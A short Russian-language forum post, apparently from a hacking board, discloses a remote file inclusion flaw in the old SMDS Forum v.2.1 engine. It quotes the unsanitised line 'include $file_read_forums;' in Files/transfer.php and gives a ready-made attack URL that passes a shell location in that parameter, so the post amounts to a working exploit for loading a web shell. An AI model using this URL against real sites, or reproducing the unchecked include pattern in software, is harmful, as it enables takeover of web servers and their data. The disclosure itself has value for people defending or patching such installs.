Только что нашел удаленный инклуд в скриптах форума. Посмотреть описание форума и скачать сам движок можно здесь. Хотя форум и очень старый, но погуглив по теме: Code: SMDS Forum v.2.1 php inclusion ничего не нашел. Уязвимость присутствует в скрипте Files/transfer.php. В строке 13 код: PHP: include $file_read_forums; позволяет провести атаку на форум: Code: http://www.example.com/[FORUM_DIR]/Files/transfer.php?file_read_forums=[shell]
